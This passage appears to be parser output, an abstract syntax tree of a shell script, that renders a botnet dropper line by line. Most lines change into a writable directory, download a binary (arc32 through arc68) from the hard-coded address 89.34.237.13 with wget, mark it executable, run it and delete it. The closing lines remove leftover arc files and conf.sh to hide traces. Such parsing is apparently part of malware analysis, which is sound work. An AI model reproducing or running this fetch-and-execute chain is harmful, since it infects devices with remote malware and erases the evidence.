    WordNode(lineno=15, pos=(1646, 1650), word='wget'),
    WordNode(lineno=15, pos=(1651, 1676), word='http://89.34.237.13/arc32'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1676, 1677)),
  CommandNode(lineno=15, pos=(1678, 1692), parts=[
    WordNode(lineno=15, pos=(1678, 1683), word='chmod'),
    WordNode(lineno=15, pos=(1684, 1686), word='+x'),
    WordNode(lineno=15, pos=(1687, 1692), word='arc32'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1692, 1693)),
  CommandNode(lineno=15, pos=(1694, 1701), parts=[
    WordNode(lineno=15, pos=(1694, 1701), word='./arc32'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1701, 1702)),
  CommandNode(lineno=15, pos=(1703, 1715), parts=[
    WordNode(lineno=15, pos=(1703, 1705), word='rm'),
    WordNode(lineno=15, pos=(1706, 1709), word='-rf'),
    WordNode(lineno=15, pos=(1710, 1715), word='arc32'),
  ]),
])
ListNode(lineno=16, pos=(1716, 1840), parts=[
  CommandNode(lineno=16, pos=(1716, 1723), parts=[
    WordNode(lineno=16, pos=(1716, 1718), word='cd'),
    WordNode(lineno=16, pos=(1719, 1723), word='/tmp'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1724, 1726)),
  CommandNode(lineno=16, pos=(1727, 1738), parts=[
    WordNode(lineno=16, pos=(1727, 1729), word='cd'),
    WordNode(lineno=16, pos=(1730, 1738), word='/var/run'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1739, 1741)),
  CommandNode(lineno=16, pos=(1742, 1749), parts=[
    WordNode(lineno=16, pos=(1742, 1744), word='cd'),
    WordNode(lineno=16, pos=(1745, 1749), word='/mnt'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1750, 1752)),
  CommandNode(lineno=16, pos=(1753, 1761), parts=[
    WordNode(lineno=16, pos=(1753, 1755), word='cd'),
    WordNode(lineno=16, pos=(1756, 1761), word='/root'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1762, 1764)),
  CommandNode(lineno=16, pos=(1765, 1769), parts=[
    WordNode(lineno=16, pos=(1765, 1767), word='cd'),
    WordNode(lineno=16, pos=(1768, 1769), word='/'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1769, 1770)),
  CommandNode(lineno=16, pos=(1771, 1801), parts=[
    WordNode(lineno=16, pos=(1771, 1775), word='wget'),
    WordNode(lineno=16, pos=(1776, 1801), word='http://89.34.237.13/arc38'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1801, 1802)),
  CommandNode(lineno=16, pos=(1803, 1817), parts=[
    WordNode(lineno=16, pos=(1803, 1808), word='chmod'),
    WordNode(lineno=16, pos=(1809, 1811), word='+x'),
    WordNode(lineno=16, pos=(1812, 1817), word='arc38'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1817, 1818)),
  CommandNode(lineno=16, pos=(1819, 1826), parts=[
    WordNode(lineno=16, pos=(1819, 1826), word='./arc38'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1826, 1827)),
  CommandNode(lineno=16, pos=(1828, 1840), parts=[
    WordNode(lineno=16, pos=(1828, 1830), word='rm'),
    WordNode(lineno=16, pos=(1831, 1834), word='-rf'),
    WordNode(lineno=16, pos=(1835, 1840), word='arc38'),
  ]),
])
ListNode(lineno=17, pos=(1841, 1965), parts=[
  CommandNode(lineno=17, pos=(1841, 1848), parts=[
    WordNode(lineno=17, pos=(1841, 1843), word='cd'),
    WordNode(lineno=17, pos=(1844, 1848), word='/tmp'),
  ]),
  OperatorNode(lineno=17, op='||', pos=(1849, 1851)),
  CommandNode(lineno=17, pos=(1852, 1863), parts=[
    WordNode(lineno=17, pos=(1852, 1854), word='cd'),
    WordNode(lineno=17, pos=(1855, 1863), word='/var/run'),
  ]),
  OperatorNode(lineno=17, op='||', pos=(1864, 1866)),
  CommandNode(lineno=17, pos=(1867, 1874), parts=[
    WordNode(lineno=17, pos=(1867, 1869), word='cd'),
    WordNode(lineno=17, pos=(1870, 1874), word='/mnt'),
  ]),
  OperatorNode(lineno=17, op='||', pos=(1875, 1877)),
  CommandNode(lineno=17, pos=(1878, 1886), parts=[
    WordNode(lineno=17, pos=(1878, 1880), word='cd'),
    WordNode(lineno=17, pos=(1881, 1886), word='/root'),
  ]),
  OperatorNode(lineno=17, op='||', pos=(1887, 1889)),
  CommandNode(lineno=17, pos=(1890, 1894), parts=[
    WordNode(lineno=17, pos=(1890, 1892), word='cd'),
    WordNode(lineno=17, pos=(1893, 1894), word='/'),
  ]),
  OperatorNode(lineno=17, op=';', pos=(1894, 1895)),
  CommandNode(lineno=17, pos=(1896, 1926), parts=[
    WordNode(lineno=17, pos=(1896, 1900), word='wget'),
    WordNode(lineno=17, pos=(1901, 1926), word='http://89.34.237.13/arc48'),
  ]),
  OperatorNode(lineno=17, op=';', pos=(1926, 1927)),
  CommandNode(lineno=17, pos=(1928, 1942), parts=[
    WordNode(lineno=17, pos=(1928, 1933), word='chmod'),
    WordNode(lineno=17, pos=(1934, 1936), word='+x'),
    WordNode(lineno=17, pos=(1937, 1942), word='arc48'),
  ]),
  OperatorNode(lineno=17, op=';', pos=(1942, 1943)),
  CommandNode(lineno=17, pos=(1944, 1951), parts=[
    WordNode(lineno=17, pos=(1944, 1951), word='./arc48'),
  ]),
  OperatorNode(lineno=17, op=';', pos=(1951, 1952)),
  CommandNode(lineno=17, pos=(1953, 1965), parts=[
    WordNode(lineno=17, pos=(1953, 1955), word='rm'),
    WordNode(lineno=17, pos=(1956, 1959), word='-rf'),
    WordNode(lineno=17, pos=(1960, 1965), word='arc48'),
  ]),
])
ListNode(lineno=18, pos=(1966, 2090), parts=[
  CommandNode(lineno=18, pos=(1966, 1973), parts=[
    WordNode(lineno=18, pos=(1966, 1968), word='cd'),
    WordNode(lineno=18, pos=(1969, 1973), word='/tmp'),
  ]),
  OperatorNode(lineno=18, op='||', pos=(1974, 1976)),
  CommandNode(lineno=18, pos=(1977, 1988), parts=[
    WordNode(lineno=18, pos=(1977, 1979), word='cd'),
    WordNode(lineno=18, pos=(1980, 1988), word='/var/run'),
  ]),
  OperatorNode(lineno=18, op='||', pos=(1989, 1991)),
  CommandNode(lineno=18, pos=(1992, 1999), parts=[
    WordNode(lineno=18, pos=(1992, 1994), word='cd'),
    WordNode(lineno=18, pos=(1995, 1999), word='/mnt'),
  ]),
  OperatorNode(lineno=18, op='||', pos=(2000, 2002)),
  CommandNode(lineno=18, pos=(2003, 2011), parts=[
    WordNode(lineno=18, pos=(2003, 2005), word='cd'),
    WordNode(lineno=18, pos=(2006, 2011), word='/root'),
  ]),
  OperatorNode(lineno=18, op='||', pos=(2012, 2014)),
  CommandNode(lineno=18, pos=(2015, 2019), parts=[
    WordNode(lineno=18, pos=(2015, 2017), word='cd'),
    WordNode(lineno=18, pos=(2018, 2019), word='/'),
  ]),
  OperatorNode(lineno=18, op=';', pos=(2019, 2020)),
  CommandNode(lineno=18, pos=(2021, 2051), parts=[
    WordNode(lineno=18, pos=(2021, 2025), word='wget'),
    WordNode(lineno=18, pos=(2026, 2051), word='http://89.34.237.13/arc58'),
  ]),
  OperatorNode(lineno=18, op=';', pos=(2051, 2052)),
  CommandNode(lineno=18, pos=(2053, 2067), parts=[
    WordNode(lineno=18, pos=(2053, 2058), word='chmod'),
    WordNode(lineno=18, pos=(2059, 2061), word='+x'),
    WordNode(lineno=18, pos=(2062, 2067), word='arc58'),
  ]),
  OperatorNode(lineno=18, op=';', pos=(2067, 2068)),
  CommandNode(lineno=18, pos=(2069, 2076), parts=[
    WordNode(lineno=18, pos=(2069, 2076), word='./arc58'),
  ]),
  OperatorNode(lineno=18, op=';', pos=(2076, 2077)),
  CommandNode(lineno=18, pos=(2078, 2090), parts=[
    WordNode(lineno=18, pos=(2078, 2080), word='rm'),
    WordNode(lineno=18, pos=(2081, 2084), word='-rf'),
    WordNode(lineno=18, pos=(2085, 2090), word='arc58'),
  ]),
])
ListNode(lineno=19, pos=(2091, 2215), parts=[
  CommandNode(lineno=19, pos=(2091, 2098), parts=[
    WordNode(lineno=19, pos=(2091, 2093), word='cd'),
    WordNode(lineno=19, pos=(2094, 2098), word='/tmp'),
  ]),
  OperatorNode(lineno=19, op='||', pos=(2099, 2101)),
  CommandNode(lineno=19, pos=(2102, 2113), parts=[
    WordNode(lineno=19, pos=(2102, 2104), word='cd'),
    WordNode(lineno=19, pos=(2105, 2113), word='/var/run'),
  ]),
  OperatorNode(lineno=19, op='||', pos=(2114, 2116)),
  CommandNode(lineno=19, pos=(2117, 2124), parts=[
    WordNode(lineno=19, pos=(2117, 2119), word='cd'),
    WordNode(lineno=19, pos=(2120, 2124), word='/mnt'),
  ]),
  OperatorNode(lineno=19, op='||', pos=(2125, 2127)),
  CommandNode(lineno=19, pos=(2128, 2136), parts=[
    WordNode(lineno=19, pos=(2128, 2130), word='cd'),
    WordNode(lineno=19, pos=(2131, 2136), word='/root'),
  ]),
  OperatorNode(lineno=19, op='||', pos=(2137, 2139)),
  CommandNode(lineno=19, pos=(2140, 2144), parts=[
    WordNode(lineno=19, pos=(2140, 2142), word='cd'),
    WordNode(lineno=19, pos=(2143, 2144), word='/'),
  ]),
  OperatorNode(lineno=19, op=';', pos=(2144, 2145)),
  CommandNode(lineno=19, pos=(2146, 2176), parts=[
    WordNode(lineno=19, pos=(2146, 2150), word='wget'),
    WordNode(lineno=19, pos=(2151, 2176), word='http://89.34.237.13/arc64'),
  ]),
  OperatorNode(lineno=19, op=';', pos=(2176, 2177)),
  CommandNode(lineno=19, pos=(2178, 2192), parts=[
    WordNode(lineno=19, pos=(2178, 2183), word='chmod'),
    WordNode(lineno=19, pos=(2184, 2186), word='+x'),
    WordNode(lineno=19, pos=(2187, 2192), word='arc64'),
  ]),
  OperatorNode(lineno=19, op=';', pos=(2192, 2193)),
  CommandNode(lineno=19, pos=(2194, 2201), parts=[
    WordNode(lineno=19, pos=(2194, 2201), word='./arc64'),
  ]),
  OperatorNode(lineno=19, op=';', pos=(2201, 2202)),
  CommandNode(lineno=19, pos=(2203, 2215), parts=[
    WordNode(lineno=19, pos=(2203, 2205), word='rm'),
    WordNode(lineno=19, pos=(2206, 2209), word='-rf'),
    WordNode(lineno=19, pos=(2210, 2215), word='arc64'),
  ]),
])
ListNode(lineno=20, pos=(2216, 2340), parts=[
  CommandNode(lineno=20, pos=(2216, 2223), parts=[
    WordNode(lineno=20, pos=(2216, 2218), word='cd'),
    WordNode(lineno=20, pos=(2219, 2223), word='/tmp'),
  ]),
  OperatorNode(lineno=20, op='||', pos=(2224, 2226)),
  CommandNode(lineno=20, pos=(2227, 2238), parts=[
    WordNode(lineno=20, pos=(2227, 2229), word='cd'),
    WordNode(lineno=20, pos=(2230, 2238), word='/var/run'),
  ]),
  OperatorNode(lineno=20, op='||', pos=(2239, 2241)),
  CommandNode(lineno=20, pos=(2242, 2249), parts=[
    WordNode(lineno=20, pos=(2242, 2244), word='cd'),
    WordNode(lineno=20, pos=(2245, 2249), word='/mnt'),
  ]),
  OperatorNode(lineno=20, op='||', pos=(2250, 2252)),
  CommandNode(lineno=20, pos=(2253, 2261), parts=[
    WordNode(lineno=20, pos=(2253, 2255), word='cd'),
    WordNode(lineno=20, pos=(2256, 2261), word='/root'),
  ]),
  OperatorNode(lineno=20, op='||', pos=(2262, 2264)),
  CommandNode(lineno=20, pos=(2265, 2269), parts=[
    WordNode(lineno=20, pos=(2265, 2267), word='cd'),
    WordNode(lineno=20, pos=(2268, 2269), word='/'),
  ]),
  OperatorNode(lineno=20, op=';', pos=(2269, 2270)),
  CommandNode(lineno=20, pos=(2271, 2301), parts=[
    WordNode(lineno=20, pos=(2271, 2275), word='wget'),
    WordNode(lineno=20, pos=(2276, 2301), word='http://89.34.237.13/arc68'),
  ]),
  OperatorNode(lineno=20, op=';', pos=(2301, 2302)),
  CommandNode(lineno=20, pos=(2303, 2317), parts=[
    WordNode(lineno=20, pos=(2303, 2308), word='chmod'),
    WordNode(lineno=20, pos=(2309, 2311), word='+x'),
    WordNode(lineno=20, pos=(2312, 2317), word='arc68'),
  ]),
  OperatorNode(lineno=20, op=';', pos=(2317, 2318)),
  CommandNode(lineno=20, pos=(2319, 2326), parts=[
    WordNode(lineno=20, pos=(2319, 2326), word='./arc68'),
  ]),
  OperatorNode(lineno=20, op=';', pos=(2326, 2327)),
  CommandNode(lineno=20, pos=(2328, 2340), parts=[
    WordNode(lineno=20, pos=(2328, 2330), word='rm'),
    WordNode(lineno=20, pos=(2331, 2334), word='-rf'),
    WordNode(lineno=20, pos=(2335, 2340), word='arc68'),
  ]),
])
ListNode(lineno=21, pos=(2341, 2403), parts=[
  CommandNode(lineno=21, pos=(2341, 2348), parts=[
    WordNode(lineno=21, pos=(2341, 2343), word='cd'),
    WordNode(lineno=21, pos=(2344, 2348), word='/tmp'),
  ]),
  OperatorNode(lineno=21, op='||', pos=(2349, 2351)),
  CommandNode(lineno=21, pos=(2352, 2363), parts=[
    WordNode(lineno=21, pos=(2352, 2354), word='cd'),
    WordNode(lineno=21, pos=(2355, 2363), word='/var/run'),
  ]),
  OperatorNode(lineno=21, op='||', pos=(2364, 2366)),
  CommandNode(lineno=21, pos=(2367, 2374), parts=[
    WordNode(lineno=21, pos=(2367, 2369), word='cd'),
    WordNode(lineno=21, pos=(2370, 2374), word='/mnt'),
  ]),
  OperatorNode(lineno=21, op='||', pos=(2375, 2377)),
  CommandNode(lineno=21, pos=(2378, 2386), parts=[
    WordNode(lineno=21, pos=(2378, 2380), word='cd'),
    WordNode(lineno=21, pos=(2381, 2386), word='/root'),
  ]),
  OperatorNode(lineno=21, op='||', pos=(2387, 2389)),
  CommandNode(lineno=21, pos=(2390, 2394), parts=[
    WordNode(lineno=21, pos=(2390, 2392), word='cd'),
    WordNode(lineno=21, pos=(2393, 2394), word='/'),
  ]),
  OperatorNode(lineno=21, op=';', pos=(2394, 2395)),
  CommandNode(lineno=21, pos=(2396, 2403), parts=[
    WordNode(lineno=21, pos=(2396, 2398), word='rm'),
    WordNode(lineno=21, pos=(2399, 2403), word='arc*'),
  ]),
])
ListNode(lineno=22, pos=(2404, 2469), parts=[
  CommandNode(lineno=22, pos=(2404, 2411), parts=[
    WordNode(lineno=22, pos=(2404, 2406), word='cd'),
    WordNode(lineno=22, pos=(2407, 2411), word='/tmp'),
  ]),
  OperatorNode(lineno=22, op='||', pos=(2412, 2414)),
  CommandNode(lineno=22, pos=(2415, 2426), parts=[
    WordNode(lineno=22, pos=(2415, 2417), word='cd'),
    WordNode(lineno=22, pos=(2418, 2426), word='/var/run'),
  ]),
  OperatorNode(lineno=22, op='||', pos=(2427, 2429)),
  CommandNode(lineno=22, pos=(2430, 2437), parts=[
    WordNode(lineno=22, pos=(2430, 2432), word='cd'),
    WordNode(lineno=22, pos=(2433, 2437), word='/mnt'),
  ]),
  OperatorNode(lineno=22, op='||', pos=(2438, 2440)),
  CommandNode(lineno=22, pos=(2441, 2449), parts=[
    WordNode(lineno=22, pos=(2441, 2443), word='cd'),
    WordNode(lineno=22, pos=(2444, 2449), word='/root'),
  ]),
  OperatorNode(lineno=22, op='||', pos=(2450, 2452)),
  CommandNode(lineno=22, pos=(2453, 2457), parts=[
    WordNode(lineno=22, pos=(2453, 2455), word='cd'),
    WordNode(lineno=22, pos=(2456, 2457), word='/'),
  ]),
  OperatorNode(lineno=22, op=';', pos=(2457, 2458)),
  CommandNode(lineno=22, pos=(2459, 2469), parts=[
    WordNode(lineno=22, pos=(2459, 2461), word='rm'),
    WordNode(lineno=22, pos=(2462, 2469), word='conf.sh'),
  ]),
])
